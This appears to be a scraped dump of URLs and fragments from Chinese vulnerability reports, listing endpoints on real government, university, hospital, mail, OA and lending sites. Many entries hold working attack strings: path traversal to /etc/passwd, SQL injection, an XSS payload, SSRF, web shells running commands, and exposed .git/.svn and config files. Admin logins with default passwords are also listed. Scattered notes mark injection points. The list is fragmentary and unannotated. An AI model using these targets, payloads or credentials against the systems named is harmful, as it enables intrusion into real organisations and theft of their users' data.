http://www.2144.cn/girls/ajaxGetFalls/?byMonth=0&cid=1&page=1&pageSize=1&t=0.09775325423106551 http://wap.he.ct10000.com/wap_heb/login.jsp输入受害者手机号,选择随机码登陆 http://mail.wfq.gov.cn/webmail/login.php?Cmd=login http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login http://mail.qtc.org.cn/webmail/login.php?Cmd=login http://mail.yphb.com.cn/webmail/login.php?Cmd=login http://mail.power-ring.cn/webmail/login.php?Cmd=login http://www.cbcmo.com/3.asp http://www.vbill.cn/mss/SafePwd/safe_rese_pwd.htm http://www.vbill.cn/mss/login/loginOut.htm?lgUrl= http://www.vbill.cn/mss/SafePwd/safe_rese_pwd3.htm?type=pwdMsg&uuid=aec1c557e4f445d59a3c91fbac8aecfe http://www.newsman.sdu.edu.cn/index_reader.aspx?paperType=sddxb http://home.sdu.edu.cn/cms/login.php http://sdgx.edu.cn/cms/login.php http://www.fdyjd.sdu.edu.cn/cms/login.php http://dev.ucms.sudiyi.cn/admin/ http://www.ircit.cn/discuz/ http://124.115.170.123/template/login.xhtml http://it365.yesky.com/ http://system.greentree.com.cn:8070/userin.aspx http://szgyj.qingdao.gov.cn/admin/main.aspx http://www.bilfinance.com/.git/config http://**.**.**.**/admin/school/SchoolManger.aspx http://**.**.**.**/admin/school/SchoolManger.aspx http://www.ynzjz.com/SysManage/InfoManage/MetaData/ http://www.ynzjz.com/SysManage/InfoManage/MetaData/FrmMetaDictList.aspx http://180.166.152.9/login http://202.136.60.58:7010/index_reader.aspx?paperType=sdjhb http://www.news.sdu.edu.cn一样的。。。都是山东大学的校报,http://www.news.sdu.edu.cn这个同样存在注入 http://oa.meteni.com/weaver/weaver.email.FileDownloadLocation?fileid=46&download=1 http://oa.meteni.com/weaver/weaver.file.filedownload?fileid=1 http://oa.meteni.com/weaver/weaver.email.FileDownloadLocation?fileid=39&download=1 http://oa.meteni.com/login/Login.jsp?logintype=1 http://www.adream.org/job_show.php?type_id=1&jobid=167 http://www.adream.org/ckfinder/ckfinder.html?action=js&func=SetFileField&data=xPicture&thumbFunc=ShowThumbnails&start=Images.asp%3A%2F%3A0 http://222.222.24.85:8585/xxcx1.aspx http://www.rcc086.com/admin/jsp/toEditAdminWithInfo.action?adminId=4 http://202.105.215.70:80/invoker/JMXInvokerServlet http://www.sx12348.cn/web/login.aspx http://terweb.cn/xly/81/show.asp?newid=140 http://terweb.cn/xly/xlyadmin/Shop_Login.htm http://61.141.236.33/ http://zone.wooyun.org/content/19358 url:http://124.164.247.149:8081/manager/html user:admin pass:123456 site:fx.vpclub.cn,可以看到大量订单信息: http://124.207.155.214:8080/ http://124.207.155.214:8080/系统,还未登录的时候,你会发现这样一个请求 http://124.207.155.214:8080/execSql.action http://124.207.155.214:8080 http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**:8030/DPMA/Web/OAArea/AreaTeacherInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**//DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://**.**.**.**:8030/DPMA/Web/OAArea/AreaTeacherWinInfo.aspx http://www.wangdaicaifu.com/Member/common/forget.html http://www.95559wsy.com/ http://www.95533ilci.com http://www.95533ilci.com/xiongdi88.asp http://wooyun.org/bugs/wooyun-2015-0120426 url:http://183.213.191.15:8081/manager/html user:admin pass:admin http://oa.cqccn.com/ http://**.**.**/wechat/ http://**.**.**/ http://192.168.28.237:8080/UserCenter/login.action http://192.168.21.1:8080/ http://ask.m.xoyo.com/config.php http://**.**.**/_ http://**.**.**/newsDetail.aspxid=13760_ http://passport.fh21.com.cn/public/retrievepassword http://www.vvcity.com/cn/item_info.php?source=yahooshopping&id=lifeessence_bathsalts-sample-1&categoryid=13538 http://wenku.baidu.com/link?url=Z00oRrMllBUR45Y1ZykKqePV9Sh0MLosTAtHYDP54KeSnj9VgSWhTjDEyhUIuFm1bZTB0NoRSDLPp4kNtk8sChk0mFrDHMJta6SSZuVAQWW http://117.34.66.204:8003/login.php http://cser.nju.edu.cn/admin/set_identity.php http://cser.nju.edu.cn/admin/info_detail.php?sid=1 http://agent.leadsec.com.cn/loginout.htm http://www.yijitongoa.com:9090/yjtoa/p/login.html www.yijitongoa.com:9090/yjtoa/s/custs/3/depts/0/users,修改custs后面参数,即可遍历所有企业信息 http://www.wooyun.org/bugs/wooyun-2015-0125516系统源码相同,均属于北京市粮食局,但又不同ip的同一套系统。 http://210.75.218.118:8080/grm http://210.75.218.118:8080/grm/core/ckeditor/cKEditorUpload!downLoadImg.action?imgPatch=/../../../../../../etc/passwd http://mdsp.avazutracking.net/.svn/entries http://cggc.avazuinc.com/.svn/entries http://mdsp.avazutracking.net/home/.svn/entries http://bi.avazu.net/.svn/entries http://mdsp.avazutracking.net/payment/paypal/.svn/entries http://bi.avazu.net/cron/phpinfo.php http://bi.avazu.net/phpinfo.php http://120.236.250.5/肇庆市社会保障卡电子相片传输系统 http://106.39.17.117:8088 User:admin Pass:123456 http://125.91.3.11/login.aspx http://baidu.hexun.com/report/ifread.php?t=1&id=617695 http://www.taiheinfo.net:8181/spam/system/index.action http://mail.dgzq.com.cn:8181/spam/system/index.action http://mail.sdhsg.com:8181/spam/system/index.action http://mail.bsu.edu.cn:8181/spam/system/index.action http://pop3.sju.js.cn:8181/spam/system/index.action http://mail.hgnu.edu.cn:8181/spam/system/index.action http://mail.zzu.edu.cn:8181/spam/system/index.action http://mail.njmetro.com.cn:8181/spam/system/index.action ip:61.146.178.37 http://msg.mooc.chaoxing.com/userObj.shtml?uid=1 www.xkkxkk.com是一家专门从事贷款的网络平台,此战存在SQL注入 http://www.xkkxkk.com/newlist.php?id=253 www.xkkxkk.com用户名及密码,登录后台 http://www.xkkxkk.com/admin/check_login.php http://mybbs.coolyun.com/ http://mybbs.coolyun.com/config/.config_global.php.swp bbs.coolpad.com/versions/v2.0.18/config/config_global.phputf-8 http://sms.999.com.cn http://218.65.95.151:8080/) http://218.65.95.151:8080/default.aspx http://113.128.254.170:8078/Login.aspx http://58.220.223.212:8071/login.asp http://119.60.2.37:2340/login.aspx http://www.gdems.com/dshkweb/login.do http://www.haoshouyi.com/index/project/detail/id/747%20%29%20%20or%20updatexml%280,concat%280xa,user%28%29%29,0%29%23%27 http://pm.weaver.cn:9085 http://pm.weaver.cn:9085/ServiceAction/com.eweaver.workflow.request.servlet.RequestlogAction?action=getrelog&requestid=402880484c2a7512014e52de46894dc5 http://www.wandacinemas.com/search/search.jsp www.wandacinemas.com http://www.hajz.cn/sms/aspx/SmsSendInfor.aspx?ID=3 http://www.hajz.cn/sms/aspx/Login.aspx http://eltest.midea.com.cn/servlet/qdbAction?cmd=start&stylesheet=login.xsl,如图所示: http://www.meipai.com http://**.**.**.**:8000/opac/index.jsp http://**.**.**.**/opac/index.jsp http://**.**.**.**:8090/opac/index.jsp http://**.**.**.**:8000/opac/index.jsp http://**.**.**.**:8070/opac/index.jsp http://www.wooyun.org/bugs/wooyun-2015-0125421/trace/7887c38e9dd625d5f38f34b17e8e9633作忽略处理。 http://111.206.37.252/WEB-INF/classes/applicationContext.muses.se.api.xml http://www.szspeed56.cn:9090/ http://www.sbr-info.com/做得中规中矩,还挺好看的。 http://www.sbr-info.com/list.php?xid=7&cid=34&vid=71'这个没什么用但是可以爆出路径。 http://www.sbr-info.com/admin/focusimg.php http://oa.china-online.com.cn http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://oa.china-online.com.cn/C6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://111.202.33.107:8080/mbp/login.jsp http://111.202.33.107:8080/is/cmd.jsp?pwd=023&cmd=whoami http://www.i-astv.com http://imall.kesion.com http://www.hfgxrc.com/dj/partylist.aspx?type= http://nc.leyou.com/service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.login.LoginAction http://open.189.cn/index.php?a=index&c=viewallability&m=api&id=3413 http://oa.china-online.com.cn http://oa.china-online.com.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1080 http://oa.china-online.com.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1080 http://www.etonmobile.com/ http://dm.zj189.cn http://baoliao.btvtech.com http://124.239.213.230/Login?ReturnUrl=%2f http://124.239.213.230 https://oa.ebinf.com/oa/enter/login.do http://sszj.wh.gov.cn/phpmyadmin http://www.jinher.com/ http://demos.jh0101.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://demos.jh0101.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://hetaogroup.com/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://oa.9500.cn/C6/Jhsoft.Web.login/NewView.aspx?ID=1 http://124.172.168.33/SystemLogin.aspx http://124.172.168.33 http://college.weimob.com/kecheng.php?aid=92 http://dacheng.weimob.com/ http://211.151.175.22/Admin/Public/login.html http://b2a.airkunming.com/b2a/agentorder/flightSearch.do?operate=teamOrderPaySuccess&orderNO=FX201504126391111 http://www.renrentou.com/ http://www.renrentou.com/project/list?keyword=* http://120.24.220.113:8080/ http://120.24.220.113:8080/userAction!userLogin.do http://fotoplace.cc/admin/src/notify/notifies.php# http://fotoplace.cc/admin/ http://fotoplace.cc/admin/src/notify/notifies.php http://**.**.**.**/areaAction.do http://**.**.**.**:8080/areaAction.do http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**/Manage/pnr_detail.aspx?id=1 http://**.**.**.**//Manage/pnr_detail.aspx?id=1 http://store.tdxinfo.com/ http://in.ebinf.com/bbs/ http://www.jinglingshu.org/?p=7901 http://www.smedi.com/engineering/design.jsp?cid=11 http://61.191.47.101:80/frame/InitBindDrop?type=2&father=11 www.54doctor.net http://www.54doctor.net/News/Main?siteId=6 http://www.jst-hosp.com.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl http://www.zjuch.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl http://www.bjyah.com/ImageUpLoad/Index?ImageId=AvatarImageUrl http://www.pkuh6.cn/ImageUpLoad/Index?ImageId=AvatarImageUrl http://wzcg.chinacoal.com:7002/b2b/web/two/indexinfoAction.do?actionType=showFlashContent&xh=14-0 http://www.chinaair365.com/distributor/flightreserve/ordersearch/orderinfo.aspx?temp=1397625790298&orderno=404152006001 https://s.bt.gg/#newwindow=1&q=Sponsoring+Registrar:+%E5%8E%A6%E9%97%A8%E7%BA%B3%E7%BD%91%E7%A7%91%E6%8A%80%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8 http://www.nwabc.cn http://www.licdai.com/ www.licdai.com http://www.licdai.com http://vip.epeaksport.com/XP001-MemberDatum/Initial.html http://image.epeaksport.com/image/Member/20150709/142017/Header/one.php http://www.yonyougov.com/index.php?m=admin&c=index&a=login&pc_hash= http://www.yonyougov.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin http://rsc.cqupt.edu.cn/list.aspx?id=20 admin:236***0012 http://dns.22.cn/ http://jyzd.sy.e21.cn/include/conn.inc1 agent.nawang.cn/order/order/settlement/menu1/menu2/menu2/0/menu3/member_id/order_str/我是注入点/source/wfk agent.nawang.cn/order/order/settlement http://www.jneq.gov.cn/newsmore1.asp?lb1=1&lb2=1 http://www.jneq.gov.cn/login.asp http://mail.ww.gov.cn/swfupload/swfupload.swf http://wooyun.org/bugs/wooyun-2010-05422 http://mail.mofcom.gov.cn//swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.wooyun.org/bugs/wooyun-2015-0124765/trace/819dfa891fcc2ab6e1ff032002758465 http://www.aokang.cn/member/usershow_list.aspx http://**.**.**.**/ http://h.aeonlife.com.cn/ http://h.aeonlife.com.cn/web-console/ http://h.aeonlife.com.cn/jbossass/jbossass.jsp http://h.aeonlife.com.cn/jbossass/jbossass.jsp?ppp=whoami http://58.32.246.97:81/ http://58.32.246.97:81/userweb/include/cache/pushCdrInfo http://58.32.246.97:81/userweb/include/tools/proxyman/ProxyMan.py http://mail.yto.net.cn/?loginOp=logout inurl:SkyTechUI http://**.**.**.**:8888/jjmszj/SkyTechUI/tzmszj/webpage/comment_list.jsp?infoid=&tabIndex=-1&programPk= http://ev.apps.cctv.com http://ev.apps.cctv.com/app_ev/program09/program/tvdiaocha/tvfirst.jsp http://ev.apps.cctv.com/console/login/LoginForm.jsp http://e.sunlands.com:8088/back/login!receptionIndex.action http://auto.ynet.com/ http://auto.ynet.com/cgi/newslist.php?dir=101 http://**.**.**.**:89/ http://58.248.253.90/ http://www.szlg.edu.cn/hudong.php?id=3144 http://www.szlg.edu.cn/hudong.php?id=3144 http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/hosts http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/hosts http://m.dianping.com/mjob/new/readFile.action?filename=../../../../../../../../../../etc/passwd http://116.228.44.9:8889/EasySW/Login.aspx http://116.228.44.9:8889/Login.aspx http://116.228.44.9:8889/EasySW_SS/ http://eservice.95549.cn/eservice/login.action?action=initGetPwd http://219.159.104.153:8080/存在命令执行漏洞 http://59.151.39.85/pre/ http://manage.dec.lzu.cn/StudentPortXML/UIStudentAndLearningAdmin_AJAX.aspx?Url=MakeXMLForStudentBaseInfo&UserName=用户名 http://www.jiathis.com/send/.svn/entries www.haoinvest.com http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp http://ev.apps.cctv.com/app_ev/program09/newsletter/searchEmail.jsp http://115.29.148.82/adhome http://www.xz9d.com/?firstRow=16&totalRows=61&m=product&s=list&id=1014 http://www.xz9d.com/xz9dadminhh/index.php http://bspt.sdeic.gov.cn:8085 http://www.qt263.cn/index.php/Article/show/id/3485.html http://**.**.**/IPSysSIPO/Manager/login.aspx https://yizhenmoney.com:9003/esb/account/customer/bankInfo/list?customerId=14051005& http://140.207.169.83:8000/upload/attachment5/14033105/00150001/1432291395569.jpg https://yizhenmoney.com:9003/esb/fortune/customer/accountinfo?customerId=14087605& http://www.dznw.com/web/search_q.asp?title1=1 http://eoffice8.weaver.cn:8028/E-mobile/flowdo_page.php?diff=delete&RUN_ID=1 http://eoffice8.weaver.cn:8028/E-mobile/flowdo_page.php?diff=delete&flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flowsorce_page.php?flowid=2 http://eoffice8.weaver.cn:8028/E-mobile/flownext_page.php?diff=candeal&detailid=2,3 http://eoffice8.weaver.cn:8028/E-mobile/flowimage_page.php?FLOW_ID=2 http://eoffice8.weaver.cn:8028/E-mobile/flowform_page.php?FLOW_ID=2 http://eoffice8.weaver.cn:8028/E-mobile/diaryother_page.php?searchword=23 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=word&sortid=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=word&idstr=2 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&sortid=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&userdept=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=addr&userpriv=1 http://eoffice8.weaver.cn:8028/E-mobile/create/ajax_do.php?diff=wordsearch&idstr=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowhave_page.php?detailid=2,3 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_free.php?flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_free.php?runid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_other.php?flowid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/flowtype_other.php?runid=1 http://eoffice8.weaver.cn:8028/E-mobile/flow/freeflowimage_page.php?fromid=2 http://eoffice8.weaver.cn:8028/E-mobile/flow/freeflowimage_page.php?diff=new&runid=2 http://dev.gfan.com/ http://tongji.gfan.com/rest/partner.json/getByProduct/demo?platformid=1&productid=3021731 http://account.pcjoy.cn/authentication.html http://www.wooyun.org/bugs/wooyun-2010-0110374 http://www.wooyun.org/bugs/wooyun-2010-0104180 http://www.wooyun.org/bugs/wooyun-2010-093546 http://bspt.sdeic.gov.cn:8085 http://bspt.sdeic.gov.cn:8081/ http://team.epeaksport.com/ http://team.epeaksport.com/ http://app1.chinadaily.com.cn/bbs/survey.shtml?msg=&sid=67 http://www.zjtzgtj.gov.cn/e/tool/feedback/index.php?id=955&bid=2&ecms=view http://219.159.71.173/webjjindex/bus_detail.jsp?busno=0109参数busno http://219.159.71.173/webjjindex/addbustype_detail.jsp?procmode=PMUPDATE&sbusno=参数sbusno redis_version:2.8.8 redis_git_sha1:00000000 redis_build_id:cd783d97535ce235 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.4.7 process_id:29985 run_id:70b67921914bf3c55bd954ff5e79d634f6c9d1a9 tcp_port:6379 uptime_in_seconds:4601107 lru_clock:10472005 config_file:/data1/terma/soft/redis-2.8.8/redis.conf client_longest_output_list:351 used_memory:1123333864 used_memory_human:1.05G used_memory_rss:1301876736 used_memory_peak:1294390120 used_memory_peak_human:1.21G used_memory_lua:33792 mem_fragmentation_ratio:1.16 mem_allocator:jemalloc-3.2.0 rdb_changes_since_last_save:954666174 rdb_last_save_time:1431934258 total_connections_received:153786 total_commands_processed:2205822709 expired_keys:4276537 keyspace_hits:168305437 keyspace_misses:5798728 role:master repl_backlog_size:1048576 used_cpu_sys:15118.22 used_cpu_user:21074.41 used_cpu_sys_children:0.00 used_cpu_user_children:0.00 db0:keys=441514,expires=181413,avg_ttl=56425055 http://118.144.36.61/ http://www.iliangcang.com/i/ufindpwd/?act=send_email&email=XXX&uid=XXX http://61.140.99.122/face/login.jsp http://61.140.99.122:80/face/login_back.jsp?USERID=11111111 http://jiwei.cqupt.edu.cn/ http://www.casetc.ac.cn/show.asp?catid=426&id=901 http://www.casetc.ac.cn/show.asp?catid=426& http://www.sqzfgjj.com/Query_Sspersons.aspx www.sqzfgjj.com http://www.yongcheng.com/new/centerIndex http://www.polchina.com.cn/service/bank_coded_lock_0.php http://www.piao88.com http://www.piao88.com/member/ordermass/id/49830 http://www.piao88.com/member/ordermass/id/1 http://www.piao88.com/member/showupdate/id/6494 http://www.piao88.com/member/showupdate/id/1 http://show.sina.com.cn/ http://space.show.sina.com.cn/ http://space.show.sina.com.cn/bloglist.php?space_uid=218835112 http://wooyun.org/bugs/wooyun-2010-098586 http://login.sina.com.cn/sso/crossdomain.php?action=login http://passport.weibo.com/wbsso/login?ticket=********** http://m.mama.cn/ask/?g=Home&a=Common&d=checkBlackList&uid=1 http://116.113.17.138:8088/login.aspx http://218.2.130.246:8082/login.aspx http://121.10.6.92/Default.aspx http://www.wlm18.com:8180/login.jsp http://218.25.10.100/ http://www.tumen.gov.cn//upfile_photo.asp http://www.tumen.gov.cn/admin//FCKeditor/editor/filemanager/connectors/uploadtest.html http://www.tumen.gov.cn/admin//FCKeditor/editor/filemanager/connectors/test.html http://www.tumen.gov.cn/news.asp?id=1202还有注人点 http://www.tthuishou.com/SearchOrder.aspx?mobile= http://www.ddxt.org/Index/loginHtml http://t.knowbox.cn/ModiPassword.aspx http://www.youxituoluo.com/member/add_project/list.php http://www.youxituoluo.com/phpMyAdmin/ http://tcm.iquanyou.com.cn/tcm/login.jsp http://59.151.39.85/pre/ http://59.151.39.85/pre/upload/default.htm http://59.151.39.85/pre/upload/sample1.htm http://59.151.39.85/pre/upload/wooyun.jpg http://59.151.39.85/pre/upload/01.jsp http://yiliao.kingdee.com/ http://www.mhealth100.com/ip-pat-mgr-web/!index.do http://xiaohua.dahe.cn/index.html http://xiaohua.dahe.cn/2015/07-11/105251837.html http://www.anquan.com.cn/index.php?m=member http://**.**.**.**:89/web/department/deptsave.php http://**.**.**.**/web/department/deptsave.php http://huashi.platform.nduoa.com/ http://ad.hz.letv.com/changanford24/php/gettextcontlist.php?memo=24节气&callback= http://ad.hz.letv.com/changanford24/php/gettextcontlist.php?memo=24节气&callback= http://sqlmap.org http://www.10010fj.cn/jsp/fa/login/faLogin.jsp redis_version:2.8.16 redis_git_sha1:00000000 redis_build_id:a645531b82b68834 redis_mode:standalone os:Linux multiplexing_api:epoll gcc_version:4.7.2 process_id:27128 run_id:a0287f93eb2136e843405315ebf8556226ad7b14 tcp_port:6379 uptime_in_seconds:25579859 uptime_in_days:296 lru_clock:10526253 config_file:/usr/local/etc/redis.conf http://www.517lppz.com/position2.php?id=-1 http://mo.gw.com.cn/iNewsDetailHtml.php?pageurl=http://127.0.0.1:22/ http://ma.apps.cctv.com/Enterprise/EnterpriseSearch.jsp http://ma.apps.cctv.com/cK/foot.jsp http://vip.gd10010.cn/vip/self/selfList.do http://112.96.28.190:8082/shop/admin/ordPrt!ordPrtList.do?user_id=DIANSHANG&out_tid=WCSV215042913412971656461&token=3266db4edfd82478a19972ddc30053f1 http://mojing.baofeng.com/ http://mojing.baofeng.com/admin/index/login http://www.sdnbyy.com/sfz/down/ xls:2156行信息 http://www.sdnbyy.com/uploadfile/ http://www.sdnbyy.com/admin/ http://www.qfkd.com.cn/city.aspx?wang=231&city=640&type=%E7%BD%91%E7%AB%99%E5%90%8D%E7%A7%B0&keywords=%E6%B5%99%E6%B1%9F http://www.qfkd.com.cn/city.aspx?wang=231&city=640&type=%E7%BD%91%E7%AB%99%E5%90%8D%E7%A7%B0&keywords=%E6%B5%99%E6%B1%9F http://www.88.com.cn:8090/admin/login www.88.com.cn:8090 http://www.88.com.cn:8090 http://bsy.7cha.com/weixin/index.php/Index/newsDetail.html?id=30 http://www.qhwjw.gov.cn:8001/infocenter/content.aspx?type=1&id=152参数id http://www.qhwjw.gov.cn:8001/MedicalGuide/guidechild.aspx?STATEID=300参数STATEID http://www.nduoa.com/ http://182.18.29.82:8080/login.html http://shbx.sxxhrss.gov.cn/sionline/notice.jsp?id= http://219.142.54.177/ http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000179591 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000013098 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000089815 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000014830 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/credit&page=/SXCreditInfo.do?actionType=creditInfoHisInit&agentID=000133596 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-25671&status=4&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=041503-7349&status=7&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/outbound&page=/confirmPrintB.do&orderId=071507-9225&status=7&subtoAgentId=000066034&SSMoney=0.00 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10452|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-10451|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/orderTouristPrintB.do&orderId=041412-104548|000000137|000000137 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-13461&companyId=GDGLGF&agentId=000000663 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071507-12712&companyId=GDGLGF&agentId=000000663 http://b2b.cits.com.cn/citsonlineWeb/switchdo.do?prefix=/domestic&page=/saleList.do&orderId=071506-9296&companyId=GDGLGF&agentId=000000663 http://bjoa.avic-intl.cn/c6/Jhsoft.Web.login/PassWordNew.aspx http://bjoa.avic-intl.cn/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 http://bjoa.avic-intl.cn/c6/JHSoft.Web.customquery/UploadImageDownLoadIn.aspx?FileID=123 www.xunzai.com User:xunzai@localhost Db:new_xunzai_disk http://dygzw.dyjr.gov.cn/ReadView.asp?id=1063 http://tonggao.baidu.com/ http://contest.24k.hk/share/detail.html?newsid=89,如图所示: http://contest.24k.hk/share/detail.html?newsid=89链接放入sqlmap检测当前用户和数据库,如图所示: http://www.hnpost.com/Uploadfile1.htm http://www.hnpost.com/UploadFace.asp http://www.hnpost.com/upme1.htm http://www.hnpost.com/upme2.htm http://www.hnpost.com/upme3.htm http://www.hnpost.com/upme4.htm http://www.hnpost.com/pic.html http://www.chinadegrees.cn/xwyyjsjyxx/zzgs/xw/zxzx/280579.shtml http://www.chinadegrees.cn/zzlk/clientStuBmk.shtml?action=doPrintStuQRS&user_bmbh=151201023220 http://libao.g.letv.com/?gid=116 http://sqlmap.org http://cvs.hexun.com/zhaopin/index.htm?area=&posttype= https://www.sukedai.com/meitibaodao/a4098.html http://www.kkkdai.com/hetong/31411614799/a266.html http://www.smjr365.com/hetong/11413440348/a236.html http://shunchangcaifu.com/hetong/11433902457/a266.html http://wenbangjinrong.com/hetong/20771431501740/a301.html http://www.zhuoxincf.com/hetong/11426320337/a361.html http://bccht.com/hetong/11426906332/a260.html http://www.lurongdai.com/hetong/11419819051/a230.html http://www.hengdacaifu.com/hetong/11424138394/a358.html http://www.zjnbcf.com/hetong/11434417762/a311.html http://www.smjr365.com/hetong/11413440478/a239.html https://www.fyjrw.com/hetong/171411698323/a365.html http://wangdai168.com/hetong/11415671635/a206.html http://www.xuefudai.com/hetong/11400834579/a193.html http://www.bccht.com/hetong/11427420975/a252.html http://www.btzhd.com/hetong/11418107944/a513.html http://www.mingfucaifu.com/hetong/a207.html http://www.donglingdai.com/hetong/11426081940/a280.html http://www.zndai.com/hetong/11422237766/a319.html http://www.qduoduo.net/hetong/20131422952463/a307.html http://www.xsbvc.com/hetong/11433815693/a251.html http://www.mingyedai.com/hetong/11423107497/a266.html http://yolo100.net/hetong/11433834019/a266.html http://www.btzhd.com/hetong/11406003017/a362.html http://ludongchuangtou.com/hetong/11422410934/a241.html http://xinruncaifu.com/hetong/11422087813/a235.html http://chengyuecaifu.com/hetong/11426987910/a240.html http://leyuancaifu.com/hetong/11423816917/a267.html http://zhuoxincf.com/hetong/11430876601/a437.html http://www.hengdacaifu.com/hetong/11435657481/a599.html http://fuhuajinrong.com/hetong/11433401169/a304.html http://donglingdai.com/hetong/6401432794278/a460.html http://bccht.com/hetong/2881435573730/a424.html http://qinghuacaifu.com/hetong/11434182603/a279.html http://zhengdaguquan.com/hetong/3181436084337/a416.html http://sdxpct.com/hetong/11429853648/a276.html http://miaomiaocaifu.com/hetong/11431170534/a656.html http://www.hongshuncaifu.com/hetong/11436172638/a232.html http://longmaocaifu.com/hetong/11430725945/a270.html http://www.91toufang.com/hetong/11435148183/a242.html http://www.yikuaict.com/hetong/4221436408356/a400.html http://www.jufuyidai.com/hetong/3711436410305/a349.html 